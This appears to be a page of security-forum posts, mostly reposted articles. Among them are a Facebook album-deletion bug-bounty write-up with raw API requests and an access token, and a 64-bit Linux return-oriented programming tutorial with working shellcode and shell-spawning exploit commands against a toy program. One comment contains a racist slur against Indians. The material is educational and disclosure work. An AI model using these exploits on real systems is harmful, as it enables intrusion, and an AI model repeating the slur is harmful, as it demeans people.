in turn, will become more aware that the problems exist. We need to realize that the problems are out there, waiting to be fixed. Thanks for reading! We hope you've enjoyed it! You can e-mail me at shok@dataforce.net, or mattc@repsec.com. See the w00w00 (www.w00w00.org) web site, also! ------------------------------------------------------------------------------ Matt Conover (a.k.a. Shok) & w00w00 Security Team [ http://www.w00w00.org, w00w00 Security Development (WSD) ] [ See the URL above for information on: what w00w00 is, our ] [ security projects (all available online), some of our ] [ articles, and more. Enjoy! ] Sursa: http://www.cgsecurity.org/exploit/heaptut.txt
  2. Nytro

    Unban paxnwo

    A evoluat mult Pax in ultimii ani (uiiu). Lasand la o parte unele glume gay, e baiat ok. Pana si black_death a evoluat. Mi-a crescut inima cand l-am auzit ca intreaba ceva de "port" (ala pana la 65535, nu ala din Constanta) <3
  3. La cum arata ar fi bine sa fie Part 1 din 700. Nu a facut nimic indianu asta nespalat. Unde e analiza? Toti indienii sunt jegosi. Si prosti. Prosti de put.
  4. Homepage: Exploit Pack - Security A fost prezentat la un Blackhat 2014 parca.
  5. Cred ca asta fusese raportat si de noi.
  6. How I Hacked Your Facebook Photos What if your photos get deleted without your knowledge? Obviously that's very disgusting isn't it? Yup this post is about a vulnerability found by me which allows a malicious user to delete any photo album on Facebook. Any photo album owned by an user or a page or a group could be deleted. Graph API is primary way for developers to read and write the users data. All the Facebook apps of now are using Graph API. In general Graph API requires an access token to read or write users data. Read more about Graph API here. According to Facebook developers documentation, photo albums cannot be deleted using the album node in Graph API. I tried to delete one of my photo albums using graph explorer access token. Request :- DELETE /518171421550249 HTTP/1.1 Host : graph.facebook.com Content-Length: 245 access_token=CAACEdEose0cBAABAXPPuULhNCsYZA2cgSbaj NEV99ZCHXoNPvp6LqgHmTNYvuNt3e5DD4wZA1eAMflPMCAGKVl aDbJQXPZAWqd3vkaAy9VvQnxyECVD0DYOpWm3we0X3lp6ZB0hl aSDSkbcilmKYLAzQ6ql1ChyViTiSH1ZBvrjZAH3RQoova87KKs GJT3adTVZBaDSIZAYxRzCNtAC0SZCMzKAyCfXXy4RMUZD Response :- {"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}} Why? Because this application doesn't have the capability to delete photo album. But we need to note the error message. It tells us that some other application does have the capability to make this API call I decided to try it with Facebook for mobile access token because we can see delete option for all photo albums in Facebook mobile application isn't it? Yeah and also it uses the same Graph API. so took a album id & Facebook for android access token of mine and tried it. Request :- DELETE /518171421550249 HTTP/1.1 Host : graph.facebook.com Content-Length: 245 access_token=<Facebook_for_Android_Access_Token> Response :- true Album(518171421550249) got deleted so whats the next step? Took victim's album id and tried to delete it. I was very curious to see the result. Request :- DELETE /518171421550249 HTTP/1.1 Host : graph.facebook.com Content-Length: 245 access_token=<Facebook_for_Android_Access_Token> Response :- true OMG the album got deleted! So i got access to delete all of your Facebook photos (photos which are public or the photos i could see) lol Immediately reported this bug to Facebook security team. They were too fast in identifying this issue and there was a fix in place in less than 2 hours from the acknowledgement of the report. Final Proof Of Concept :- Request :- DELETE /<Victim's_photo_album_id> HTTP/1.1 Host : graph.facebook.com Content-Length: 245 access_token=<Your(Attacker)_Facebook_for_Android_Access_Token> if you aren't sure about how to do it, please see this video First acknowledgement from Facebook security team Acknowledgement of fix and rewarded me $12500 USD for reporting this vulnerability. Now its completely fixed. Thank you Facebook Security Team for running bug bounty program and also for quickly fixing this issue Soon i ll get my listed for the year 2015 HALL OF FAME : https://www.facebook.com/whitehat/thanks Posted by Laxman Muthiyah at 00:30 Sursa: http://www.7xter.com/2015/02/how-i-hacked-your-facebook-photos.html
  7. Apktool 2.0.0 RC4 Released February 12, 2015 Apktool 2.0.0 RC4 has been released. I was going to tag this version as 2.0 Gold, but since RC3 introduced a completely written aapt that caused a plethora of errors. I've decided to hold another release candidate. This released contained 47 commits by 6 people. 27 of the commits belonging to the updated smali release. Notable in this release is the fix that aapt introduced with implictly adding qualifiers. This caused resource directories to change from drawable-hdpi to drawable-hdpi-v11 as an example. This in theory shouldn't of broken anything, but bug reports proved otherwise. Since Apktool isn't your "first" tool to build an APK. I determined it was best to just skip this step of adding qualifiers. 0xD34D from Cyanogenhelped me figure that out. Changes since RC3 Updated to smali/baksmali 2.0.5 [#685] - Fixed select invalid attrs from Lollipop APKs [#713] - Added support for APKs that utilized Shared Resources [#329] - Fixed issue identifying strings that were named liked filepaths as ResFiles [#590] - Fixed isolated issue with segfaulting apks [#545] - Fixed issue with undefined attributes [#702] - Fixed invalid treating of MNC_ZERO which caused duplicate resources [#744] - Fixed ugly warnings of "Cleaning up unclosed ZipFile...." [#757] - Fixed downloading gradle over http, instead of https [#402] - Fixed issue with framework storage when user has no access to $HOME Notes There was no framework update in RC4, but if RC4 is your first version please delete the file at $HOME/apktool/framework/1.apk before trying RC4. Download Apktool 2.0.0 RC4 - md5 672f12efc5ffee79f3670f36cd6bbb64 Rename to apktool.jar and follow Instruction Guide if you need help. Links Github Bug Tracker XDA Thread Sursa: http://connortumbleson.com/2015/02/12/apktool-2-0-0-rc4-released/
  8. 64-bit Linux Return-Oriented Programming Nobody’s perfect. Particularly not programmers. Some days, we spend half our time fixing mistakes we made in the other half. And that’s when we’re lucky: often, a subtle bug escapes unnoticed into the wild, and we only learn of it after a monumental catastrophe. Some disasters are accidental. For example, an unlucky chain of events might result in the precise conditions needed to trigger an overlooked logic error. Other disasters are deliberate. Like an accountant abusing a tax loophole lurking in a labyrinth of complex rules, an attacker might discover a bug, then exploit it to take over many computers. Accordingly, modern systems are replete with security features designed to prevent evildoers from exploiting bugs. These safeguards might, for instance, hide vital information, or halt execution of a program as soon as they detect anomalous behaviour. Executable space protection is one such defence. Unfortunately, it is an ineffective defence. In this guide, we show how to circumvent executable space protection on 64-bit Linux using a technique known as return-oriented programming. Some assembly required We begin our journey by writing assembly to launch a shell via the execve system call. For backwards compatibility, 32-bit Linux system calls are supported in 64-bit Linux, so we might think we can reuse shellcode targeted for 32-bit systems. However, the execve syscall takes a memory address holding the NUL-terminated name of the program that should be executed. Our shellcode might be injected someplace that requires us to refer to memory addresses larger than 32 bits. Thus we must use 64-bit system calls. The following may aid those accustomed to 32-bit assembly. [TABLE=class: tableblock frame-all grid-all, width: 576] [TR] [TH=class: halign-left valign-top][/TH] [TH=class: halign-left valign-top]32-bit syscall[/TH] [TH=class: halign-left valign-top]64-bit syscall[/TH] [/TR] [TR] [TD=class: halign-left valign-top]instruction[/TD] [TD=class: halign-left valign-top]int $0x80[/TD] [TD=class: halign-left valign-top]syscall[/TD] [/TR] [TR] [TD=class: halign-left valign-top]syscall number[/TD] [TD=class: halign-left valign-top]EAX, e.g. execve = 0xb[/TD] [TD=class: halign-left valign-top]RAX, e.g. execve = 0x3b[/TD] [/TR] [TR] [TD=class: halign-left valign-top]up to 6 inputs[/TD] [TD=class: halign-left valign-top]EBX, ECX, EDX, ESI, EDI, EBP[/TD] [TD=class: halign-left valign-top]RDI, RSI, RDX, R10, R8, R9[/TD] [/TR] [TR] [TD=class: halign-left valign-top]over 6 inputs[/TD] [TD=class: halign-left valign-top]in RAM; EBX points to them[/TD] [TD=class: halign-left valign-top]forbidden[/TD] [/TR] [TR] [TD=class: halign-left valign-top]example[/TD] [TD=class: halign-left valign-top]mov $0xb, %eax lea string_addr, %ebx mov $0, %ecx mov $0, %edx int $0x80 [/TD] [TD=class: halign-left valign-top]mov $0x3b, %rax lea string_addr, %rdi mov $0, %rsi mov $0, %rdx syscall [/TD] [/TR] [/TABLE] We inline our assembly code in a C file, which we call shell.c: int main() { asm("\ needle0: jmp there\n\ here: pop %rdi\n\ xor %rax, %rax\n\ movb $0x3b, %al\n\ xor %rsi, %rsi\n\ xor %rdx, %rdx\n\ syscall\n\ there: call here\n\ .string \"/bin/sh\"\n\ needle1: .octa 0xdeadbeef\n\ "); } No matter where in memory our code winds up, the call-pop trick will load the RDI register with the address of the "/bin/sh" string. The needle0 and needle1 labels are to aid searches later on; so is the0xdeadbeef constant (though since x86 is little-endian, it will show up as EF BE AD DE followed by 4 zero bytes). For simplicity, we’re using the API incorrectly; the second and third arguments to execve are supposed to point to NULL-terminated arrays of pointers to strings (argv[] and envp[]). However, our system is forgiving: running "/bin/sh" with NULL argv and envp succeeds: ubuntu:~$ gcc shell.c ubuntu:~$ ./a.out $ In any case, adding argv and envp arrays is straightforward. The shell game We extract the payload we wish to inject. Let’s examine the machine code: $ objdump -d a.out | sed -n '/needle0/,/needle1/p' 00000000004004bf <needle0>: 4004bf: eb 0e jmp 4004cf <there> 00000000004004c1 <here>: 4004c1: 5f pop %rdi 4004c2: 48 31 c0 xor %rax,%rax 4004c5: b0 3b mov $0x3b,%al 4004c7: 48 31 f6 xor %rsi,%rsi 4004ca: 48 31 d2 xor %rdx,%rdx 4004cd: 0f 05 syscall 00000000004004cf <there>: 4004cf: e8 ed ff ff ff callq 4004c1 <here> 4004d4: 2f (bad) 4004d5: 62 (bad) 4004d6: 69 6e 2f 73 68 00 ef imul $0xef006873,0x2f(%rsi),%ebp 00000000004004dc <needle1>: On 64-bit systems, the code segment is usually placed at 0x400000, so in the binary, our code lies starts at offset 0x4bf and finishes right before offset 0x4dc. This is 29 bytes: $ echo $((0x4dc-0x4bf)) 29 We round this up to the next multiple of 8 to get 32, then run: $ xxd -s0x4bf -l32 -p a.out shellcode Let’s take a look: $ cat shellcode eb0e5f4831c0b03b4831f64831d20f05e8edffffff2f62696e2f736800ef bead Learn bad C in only 1 hour! An awful C tutorial might contain an example like the following victim.c: #include <stdio.h> int main() { char name[64]; puts("What's your name?"); gets(name); printf("Hello, %s!\n", name); return 0; } Thanks to the cdecl calling convention for x86 systems, if we input a really long string, we’ll overflow the name buffer, and overwrite the return address. Enter the shellcode followed by the right bytes and the program will unwittingly run it when trying to return from the main function. The Three Trials of Code Injection Alas, stack smashing is much harder these days. On my stock Ubuntu 12.04 install, there are 3 countermeasures: GCC Stack-Smashing Protector (SSP), aka ProPolice: the compiler rearranges the stack layout to make buffer overflows less dangerous and inserts runtime stack integrity checks. Executable space protection (NX): attempting to execute code in the stack causes a segmentation fault. This feature goes by many names, e.g. Data Execution Prevention (DEP) on Windows, or Write XOR Execute (W^X) on BSD. We call it NX here, because 64-bit Linux implements this feature with the CPU’s NX bit ("Never eXecute"). Address Space Layout Randomization (ASLR): the location of the stack is randomized every run, so even if we can overwrite the return address, we have no idea what to put there. We’ll cheat to get around them. Firstly, we disable the SSP: $ gcc -fno-stack-protector -o victim victim.c Next, we disable executable space protection: $ execstack -s victim Lastly, we disable ASLR when running the binary: $ setarch `arch` -R ./victim What's your name? World Hello, World! One more cheat. We’ll simply print the buffer location: #include <stdio.h> int main() { char name[64]; printf("%p\n", name); // Print address of buffer. puts("What's your name?"); gets(name); printf("Hello, %s!\n", name); return 0; } Recompile and run it: $ setarch `arch` -R ./victim 0x7fffffffe090 What's your name? The same address should appear on subsequent runs. We need it in little-endian: $ a=`printf %016x 0x7fffffffe090 | tac -rs..` $ echo $a 90e0ffffff7f0000 Success! At last, we can attack our vulnerable program: $ ( ( cat shellcode ; printf %080d 0 ; echo $a ) | xxd -r -p ; cat ) | setarch `arch` -R ./victim The shellcode takes up the first 32 bytes of the buffer. The 80 zeroes in the printf represent 40 zero bytes, 32 of which fill the rest of the buffer, and the remaining 8 overwrite the saved location of the RBP register. The next 8 overwrite the return address, and point to the beginning of the buffer where our shellcode lies. Hit Enter a few times, then type "ls" to confirm that we are indeed in a running shell. There is no prompt, because the standard input is provided bycat, and not the terminal (/dev/tty). The Importance of Being Patched Just for fun, we’ll take a detour and look into ASLR. In the old days, you could read the ESP register of any process by looking at /proc/pid/stat. This leak was plugged long ago. (Nowadays, a process can spy on a given process only if it has permission to ptrace() it.) Let’s pretend we’re on an unpatched system, as it’s more satisfying to cheat less. Also, we see first-hand the importance of being patched, and why ASLR needs secrecy as well as randomness. Inspired by a presentation by Tavis Ormandy and Julien Tinnes, we run: $ ps -eo cmd,esp First, we run the victim program without ASLR: $ setarch `arch` -R ./victim and in another terminal: $ ps -o cmd,esp -C victim ./victim ffffe038 Thus while the victim program is waiting for user input, it’s stack pointer is 0x7fffffe038. We calculate the distance from this pointer to the name buffer: $ echo $((0x7fffffe090-0x7fffffe038)) 88 We are now armed with the offset we need to defeat ASLR on older systems. After running the victim program with ASLR reenabled: $ ./victim we can find the relevant pointer by spying on the process, then adding the offset: $ ps -o cmd,esp -C victim ./victim 43a4b538 $ printf %x\\n $((0x7fff43a4b538+88)) 7fff43a4b590 Perhaps it’s easiest to demonstrate with named pipes: $ mkfifo pip $ cat pip | ./victim In another terminal, we type: $ sp=`ps --no-header -C victim -o esp` $ a=`printf %016x $((0x7fff$sp+88)) | tac -r -s..` $ ( ( cat shellcode ; printf %080d 0 ; echo $a ) | xxd -r -p ; cat ) > pip and after hitting enter a few times, we can enter shell commands. Executable space perversion Recompile the victim program without running the execstack command. Alternatively, reactivate executable space protection by running: $ execstack -c victim Try attacking this binary as above. Our efforts are thwarted as soon as the program jumps to our injected shellcode in the stack. The whole area is marked nonexecutable, so we get shut down. Return-oriented programming deftly sidesteps this defence. The classic buffer overflow exploit fills the buffer with code we want to run; return-oriented programming instead fills the buffer with addresses of snippets of code we want to run, turning the stack pointer into a sort of indirect instruction pointer. The snippets of code are handpicked from executable memory: for example, they might be fragments of libc. Hence the NX bit is powerless to stop us. In more detail: We start with SP pointing to the start of a series of addresses. A RET instruction kicks things off. Forget RET’s usual meaning of returning from a subroutine. Instead, focus on its effects: RET jumps to the address in the memory location held by SP, and increments SP by 8 (on a 64-bit system). After executing a few instructions, we encounter a RET. See step 2. In return-oriented programming, a sequence of instructions ending in RET is called a gadget. Go go gadgets Our mission is to call the libc system() function with "/bin/sh" as the argument. We can do this by calling a gadget that assigns a chosen value to RDI and then jump to the system() libc function. First, where’s libc? $ locate libc.so /lib/i386-linux-gnu/libc.so.6 /lib/x86_64-linux-gnu/libc.so.6 /lib32/libc.so.6 /usr/lib/x86_64-linux-gnu/libc.so My system has a 32-bit and a 64-bit libc. We want the 64-bit one; that’s the second on the list. Next, what kind of gadgets are available anyway? $ objdump -d /lib/x86_64-linux-gnu/libc.so.6 | grep -B5 ret The selection is reasonable, but our quick-and-dirty search only finds intentional snippets of code. We can do better. In our case, we would very much like to execute: pop %rdi retq while the pointer to "/bin/sh" is at the top of the stack. This would assign the pointer to RDI before advancing the stack pointer. The corresponding machine code is the two-byte sequence 0x5f 0xc3, which ought to occur somewhere in libc. Sadly, I know of no widespread Linux tool that searches a file for a given sequence of bytes; most tools seem oriented towards text files and expect their inputs to be organized with newlines. (I’m reminded of Rob Pike’s "Structural Regular Expressions".) We settle for an ugly workaround: $ xxd -c1 -p /lib/x86_64-linux-gnu/libc.so.6 | grep -n -B1 c3 | grep 5f -m1 | awk '{printf"%x\n",$1-1}' 22a12 In other words: Dump the library, one hex code per line. Look for "c3", and print one line of leading context along with the matches. We also print the line numbers. Look for the first "5f" match within the results. As line numbers start from 1 and offsets start from 0, we must subtract 1 to get the latter from the former. Also, we want the address in hexadecimal. Asking Awk to treat the first argument as a number (due to the subtraction) conveniently drops all the characters after the digits, namely the "-5f" that grep outputs. We’re almost there. If we overwrite the return address with the following sequence: libc’s address + 0x22a12 address of "/bin/sh" address of libc’s system() function then on executing the next RET instruction, the program will pop the address of "/bin/sh" into RDI thanks to the first gadget, then jump to the system function. Many happy returns In one terminal, run: $ setarch `arch` -R ./victim And in another: $ pid=`ps -C victim -o pid --no-headers | tr -d ' '` $ grep libc /proc/$pid/maps 7ffff7a1d000-7ffff7bd0000 r-xp 00000000 08:05 7078182 /lib/x86_64-linux-gnu/libc-2.15.so 7ffff7bd0000-7ffff7dcf000 ---p 001b3000 08:05 7078182 /lib/x86_64-linux-gnu/libc-2.15.so 7ffff7dcf000-7ffff7dd3000 r--p 001b2000 08:05 7078182 /lib/x86_64-linux-gnu/libc-2.15.so 7ffff7dd3000-7ffff7dd5000 rw-p 001b6000 08:05 7078182 /lib/x86_64-linux-gnu/libc-2.15.so Thus libc is loaded into memory starting at 0x7ffff7a1d000. That gives us our first ingredient: the address of the gadget is 0x7ffff7a1d000 + 0x22a12. Next we want "/bin/sh" somewhere in memory. We can proceed similarly to before and place this string at the beginning of the buffer. From before, its address is 0x7fffffffe090. The final ingredient is the location of the system library function. $ nm -D /lib/x86_64-linux-gnu/libc.so.6 | grep '\<system\>' 0000000000044320 W system Gotcha! The system function lives at 0x7ffff7a1d000 + 0x44320. Putting it all together: $ (echo -n /bin/sh | xxd -p; printf %0130d 0; printf %016x $((0x7ffff7a1d000+0x22a12)) | tac -rs..; printf %016x 0x7fffffffe090 | tac -rs..; printf %016x $((0x7ffff7a1d000+0x44320)) | tac -rs..) | xxd -r -p | setarch `arch` -R ./victim Hit enter a few times, then type in some commands to confirm this indeed spawns a shell. There are 130 0s this time, which xxd turns into 65 zero bytes. This is exactly enough to cover the rest of the buffer after "/bin/sh" as well as the pushed RBP register, so that the very next location we overwrite is the top of the stack. Debriefing In our brief adventure, ProPolice is the best defence. It tries to move arrays to the highest parts of the stack, so less can be achieved by overflowing them. Additionally, it places certain values at the ends of arrays, which are known as canaries. It inserts checks before return instructions that halts execution if the canaries are harmed. We had to disable ProPolice completely to get started. ASLR also defends against our attack provided there is sufficient entropy, and the randomness is kept secret. This is in fact rather tricky. We saw how older systems leaked information via /proc. In general, attackers have devised many ingenious methods to learn addresses that are meant to be hidden. Last, and least, we have executable space protection. It turned out to be toothless. So what if we can’t run code in the stack? We’ll simply point to code elsewhere and run that instead! We used libc, but in general, there is usually some corpus of code we can raid. For example, researchers compromised a voting machine with extensive executable space protection, turning its own code against it. Funnily enough, the cost of each measure seems inversely proportional to its benefit: Executable space protection requires special hardware (the NX bit) or expensive software emulation. ASLR requires cooperation from many parties. Programs and libraries alike must be loaded in random addresses. Information leaks must be plugged. ProPolice requires a compiler patch. Security theater One may ask: if executable space protection is so easily circumvented, is it worth having? Somebody must have thought so, because it is so prevalent now. Perhaps it’s time to ask: is executable space protection worth removing? Is executable space protection better than nothing? We just saw how trivial it is to stitch together shreds of existing code to do our dirty work. We barely scratched the surface: with just a few gadgets, any computation is possible. Furthermore, there are tools that mine libraries for gadgets, and compilers that convert an input language into a series of addresses, ready for use on an unsuspecting non-executable stack. A well-armed attacker may as well forget executable space protection even exists. Therefore, I argue executable space protection is worse than nothing. Aside from being high-cost and low-benefit, it segregates code from data. As Rob Pike puts it: This flies in the face of the theories of Turing and von Neumann, which define the basic principles of the stored-program computer. Code and data are the same, or at least they can be. But worse still are its implications for programmers. Executable space protection interferes with self-modifying code, which is invaluable for just-in-time compiling, and for miraculously breathing new life into ancient calling conventions set in stone. In a paper describing how to add nested functions to C despite its simple calling convention and thin pointers, Thomas Breuel observes: There are, however, some architectures and/or operating systems that forbid a program to generate and execute code at runtime. We consider this restriction arbitrary and consider it poor hardware or software design. Implementations of programming languages such as FORTH, Lisp, or Smalltalk can benefit significantly from the ability to generate or modify code quickly at runtime. Epilogue Many thanks to Hovav Shacham, who first brought return-oriented programming to my attention. He co-authored a comprehensive introduction to return-oriented programming. Also, see the technical details of howreturn-oriented programming usurped a voting machine. We focused on a specific attack. The defences we ran into can be much less effective for other kinds of attacks. For example, ASLR has a hard time fending off heap spraying. Return-to-libc Return-oriented programming is a generalization of the return-to-libc attack, which calls library functions instead of gadgets. In 32-bit Linux, the C calling convention is helpful, since arguments are passed on the stack: all we need to do is rig the stack so it holds our arguments and the address the library function. When RET is executed, we’re in business. However, the 64-bit C calling convention is identical to that of 64-bit system calls, except RCX takes the place of R10, and more than 6 arguments may be present (any extras are placed on the stack in right-to-left order). Overflowing the buffer only allows us to control the contents of the stack, and not the registers, complicating return-to-libc attacks. The new calling convention still plays nice with return-oriented programming, because gadgets can manipulate registers. GDB Just as builders remove the scaffolding after finishing a skyscraper, I omitted the GDB sessions which helped me along the way. Did you think I could get these exploits byte-perfect the first time? I wish! Speaking of which, I’m almost certain I’ve never used a debugger to debug! I’ve only used them to program in assembly, to investigate binaries for which I lacked the source, and now, for buffer overflow exploits. A quote from Linus Torvalds come to mind: I don’t like debuggers. Never have, probably never will. I use gdb all the time, but I tend to use it not as a debugger, but as a disassembler on steroids that you can program. as does another from Brian Kernighan: The most effective debugging tool is still careful thought, coupled with judiciously placed print statements. I’m unsure if I’ll ever write about GDB, since so many guides already exist. For now, I’ll list a few choice commands: $ gdb victim start < shellcode disas break *0x00000000004005c1 cont p $rsp ni si x/10i0x400470 GDB helpfully places the code deterministically, though the location it chooses differs slightly to the shell’s choice when ASLR is disabled. Transcripts I’ve summarized the above in a couple of shell scripts: classic.sh: the classic buffer overflow attack. rop.sh: the return-oriented programming version. They work on my system (Ubuntu 12.04 on x86_64). Sursa: http://crypto.stanford.edu/~blynn/rop/
  9. How to remotely install malicious apps on Android devices by Pierluigi Paganini on February 13th, 2015 Security researchers discovered how to install and launch malicious applications remotely on Android devices exploiting two flaws. Security researchers have uncovered a couple of vulnerabilities in the Google Play Store that could allow cyber criminals to install and launch malicious apps remotely on Android mobile devices. The expert Tod Beardsley, technical lead for the Metasploit Framework at Rapid7 explained that attackers can install any arbitrary app from the Play store onto victims’ device even without the consent. This is possible by combining the exploitation of an X-Frame-Options (XFO) vulnerability with Android WebView (Jelly Bean) flaw. The flaw affects mobile devices running Android version 4.3 Jelly Bean and earlier versions, also devices running third party browsers are vulnerable. The researcher reported that the web browser in Android 4.3 and prior versions are vulnerable to a Universal Cross-Site Scripting (UXSS) attack, meanwhile the Google Play Store is vulnerable to a Cross-Site Scripting (XSS) flaw. In the UXSS attack scenario, hackers exploit client-side vulnerabilities affecting a web browser or browser extensions to run a XSS attack, which allows the execution of malicious code bypassing security protection mechanisms in the web browser. “Users of these platforms may also have installed vulnerable aftermarket browsers,” Beardsley wrote in a blog post on Tuesday.”Of the vulnerable population, it is expected that many users are habitually signed into Google services, such as Gmail or YouTube. These mobile platforms are the the ones most at risk. Other browsers may also be affected.” “Until the Google Play store XFO [X-Frame-Options] gap is mitigated, users of these web applications who habitually sign in to their Google Account will remain vulnerable.” The expert provided the JavaScript and Ruby code that could be used get a response from the play.google.com domain without an appropriate XFO header: Rapid7 has already published a Metasploit module to exploit the flaw, Module for R7-2015-02 #4742, which is available made public on Github. “This module combines two vulnerabilities to achieve remote code execution on affected Android devices. First, the module exploits CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in versions of Android’s open source stock browser (the AOSP Browser) prior to 4.4. Second, the Google Play store’s web interface fails to enforce a X-Frame-Options: DENY header (XFO) on some error pages, and therefore, can be targeted for script injection. As a result, this leads to remote code execution through Google Play’s remote installation feature, as any application available on the Google Play store can be installed and launched on the user’s device. This module requires that the user is logged into Google with a vulnerable browser.” reads the advisory. To mitigate the security issue: Use a web browser that is not affected by UXSS flaws (i.e. Google Chrome or Mozilla Firefox or Dolphin). Log out of the Google Play store account in order to avoid the vulnerability. Pierluigi Paganini (Security Affairs – Google Android, hacking) Sursa: http://securityaffairs.co/wordpress/33456/hacking/remotely-hack-android.html
  10. Nytro

    BSA

    Haaa, warn si ban
  11. Introducing Registry Explorer Registry Explorer is a new approach to interacting with Registry hives. It has several unique capabilities not found in other programs. The version being discussed here is 0.0.1.8 (some of the screenshots may reflect v0.0.1.7). It is an early beta version of RE compared to where it will be but the features discussed below are ready for general use. Known issues: Large hives (SOFTWARE hives especially) can be slow to load in RE due to the number of keys that exist (often hundreds of thousands). Give RE a few minutes to load them tho and it will work. This is being addressed. Getting started To get started, lets take a look at the main interface. There is of course a standard menu bar at the top of the screen. Most of the options are self-explanatory, but lets look at a few of them. View | Messages The Messages window is automatically displayed when RE starts. It will contain information about loading hives, warnings, errors, etc. If you have used ShellBags Explorer, it looks and feels pretty much the same as in SBE. Download: binary foray: Software Sursa: binary foray: Introducing Registry Explorer
  12. Posted by James Forshaw currently impersonating NT AUTHORITY\SYSTEM. Much as I enjoy the process of vulnerability research sometimes there’s a significant disparity between the difficulty of finding a vulnerability and exploiting it. The Project Zero blog containsnumerousexamples of complex exploits for seemingly trivial vulnerabilities. You might wonder why we’d go to this level of effort to prove exploitability, surely we don’t need to do so? Hopefully by the end of this blog post you’ll have a better understanding of why it’s often the case we spend a significant effort to demonstrate a security issue by developing a working proof of concept. Our primary target for a PoC is the vendor, but there are other benefits for developing one. A customer of the vendor’s system can use the PoC to test whether they’re vulnerable to the issue and ensure any patch has been correctly applied. And the security industry can use it to develop mitigations and signatures for the vulnerability even if the vendor is not willing or able to patch. Without the PoC being made available only people who reverse engineer the patch are likely to know about it, and they might not have your best interests in mind. I don’t want this blog post to get bogged down in too much technical detail about the bug (CVE-2015-0002 for reference). Instead I’m going to focus on the process of taking that relatively simple vulnerability, determining exploitability and developing a PoC. This PoC should be sufficient for a vendor to make a reasonable assessment of the presented vulnerability to minimize their triage efforts. I’ll also explain my rationale for taking various shortcuts in the PoC development and why it has to be so. Reporting a Vulnerability One of the biggest issues with vulnerability research on closed or proprietary systems is dealing with the actual reporting process to get a vulnerability fixed. This is especially the case in complex or non-obvious vulnerabilities. If the system is open source, I could develop a patch, submit it and it stands a chance of getting fixed. For a closed source system I will have to go through the process of reporting. To understand this better let’s think about what a typical large vendor might need to do when receiving external security vulnerability reports. This is a really simplified view on vulnerability response handling but it’s sufficient to explain the principles. For a company which develops the majority of their software internally I would have little influence over the patching cycle, but I can make a difference in the triage cycle. The easier I can make the vendor’s life the shorter the triage cycle can be and the quicker we can get a patch released. Everyone wins, except hopefully the people who might be using this vulnerability already. Don’t forget just because I didn’t know about this vulnerability before doesn’t mean it isn’t already known about. In an ideal vulnerability research world (i.e. one in which I have to do the least amount of non-research work) if I find a bug all I’d need to do is write up some quick notes about it, send it to a vendor, they’ll understand the system, they’ll immediately move heaven and earth to develop the patch, job done. Of course it doesn’t work that way, sometimes just getting a vendor to recognize there’s even a security issue is an important first step. There can be a significant barrier between moving from the triage cycle to the patch cycle, especially as they’re usually separate entities inside a company. To provide for the best chance possible I’ll do two things: Put together a report of sufficient detail so the vendor understands the vulnerability Develop a PoC which unequivocally demonstrates the security impact Writing up a Report Writing up a report for the vendor is pretty crucial to getting an issue fixed, although it isn’t sufficient in many cases. You can imagine if I wrote something like, “Bug in ahcache.sys, fixit, *lol*” that doesn’t really help the vendor much. At the very least I’d want to provide some context such as what systems the vulnerability affects (and doesn’t affect), what the impact of the vulnerability is (to the best of my knowledge) and what area of the system the issue resides. Why wouldn’t just the report be sufficient? Think about how a large modern software product is developed. It’s likely developed between a team of people who might work on individual parts. Depending on the age of the vulnerable code the original developer might have moved on to other projects, left the company entirely or been hit by the number 42 bus. Even if it’s relatively recent code written by a single person who’s still around to talk to it doesn’t mean they remember how the code works. Anyone who’s developed software of any size will have come across code they wrote, a month, week or even a day ago and wondered how it works. There’s a real possibility that the security researcher who’s spent time going through the executable instruction by instruction might know it better than anyone in the world. Also you can think about the report in a scientific sense, it’s your vulnerability hypothesis. Some vulnerabilities can be proven, for example a buffer overflow can typically be proven mathematically, placing 10 things into space for 5 doesn’t work. But in many cases there’s nothing better than empirical proof of exploitability. If done right it can be experimentally validated by both the reporter and the vendor, this is the value of a proof-of-concept. Correctly developed the vendor can observe the effects of the experiment, converting my hypothesis to a theory which no-one can disprove. Proving Exploitability through Experimentation So the hypothesis posits that the vulnerability has a real-world security impact, we’ll prove it objectively using our PoC. In order to do this we need to provide the vendor not just with the mechanism to prove that the vulnerability is real but also clear observations that can be made and why those observations constitute a security issue. What observations need to be made depend on the type of vulnerability. For memory corruption vulnerabilities it might be sufficient to demonstrate an application crashing in response to certain input. This isn’t always the case, some memory corruptions don’t provide the attacker any useful control. Therefore demonstrating control over the current execution flow, such as controlling the EIP register is usually the ideal. For logical vulnerabilities it might be more nuanced, such as you can write a file to a location you shouldn’t be able to or the calculator application ends up running with elevated privileges. There’s no one-size-fits-all approach, however at the very least you want to demonstrate some security impact which can be observed objectively. The thing to understand is I’m not developing a PoC for the purposes of being a useful exploit (from an attacker perspective) but to prove it’s a security issue to a sufficient level of confidence that it will get fixed. Unfortunately it isn’t always easy to separate these two aspects and sometimes without demonstrating local privilege escalation or remote code execution it isn’t taken as seriously as it should be. Developing a Proof of Concept Now let’s go into some of the challenges I faced in developing a PoC for the ahcache vulnerability I identified. Let’s not forget there’s a trade off between the time spent developing a PoC and the chance of the vulnerability being fixed. If I don’t spend enough time to develop a working PoC the vendor could turn around and not fix the vulnerability, on the other hand the more time I spend the longer this vulnerability exists which is potentially as bad for users. Vulnerability Technical Details Having a bit of understanding of the vulnerability will help us frame the discussion later. You can view the issue here with the attached PoC that I sent to Microsoft. The vulnerability exists in the ahcache.sys driver which was introduced in Windows 8.1 but in essence this driver implements the Windows native system call NtApphelpCacheControl. This system call handles a local cache for application compatibility information which is used to correct application behaviour on newer versions of Windows. You can read more about application compatibility here. Some operations of this system call are privileged so the driver does a check of the current calling application to ensure they have administrator privileges. This is done in the function AhcVerifyAdminContext which looks something like the following code: BOOLEAN AhcVerifyAdminContext() { BOOLEAN CopyOnOpen; BOOLEAN EffectiveOnly; SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; PACCESS_TOKEN token = PsReferenceImpersonationToken( NtCurrentThread(), &CopyOnOpen, &EffectiveOnly, &ImpersonationLevel); if (token == NULL) { token = PsReferencePrimaryToken(NtCurrentProcess()); } PSID user = GetTokenUser(token); if(RtlEqualSid(user, LocalSystemSid) || SeTokenIsAdmin(token)) { return TRUE; } return FALSE; } This code queries to see if the current thread is impersonating another user. Windows allows a thread to pretend to be someone else on the system so that security operations can be correctly evaluated. If the thread is impersonating a pointer to an access token is returned. If NULL is returned from PsReferenceImpersonationToken the code queries for the current process’ access token. Finally the code checks whether either the access token’s user is the local system user or the token is a member of the Administrators group. If the function returns TRUE then the 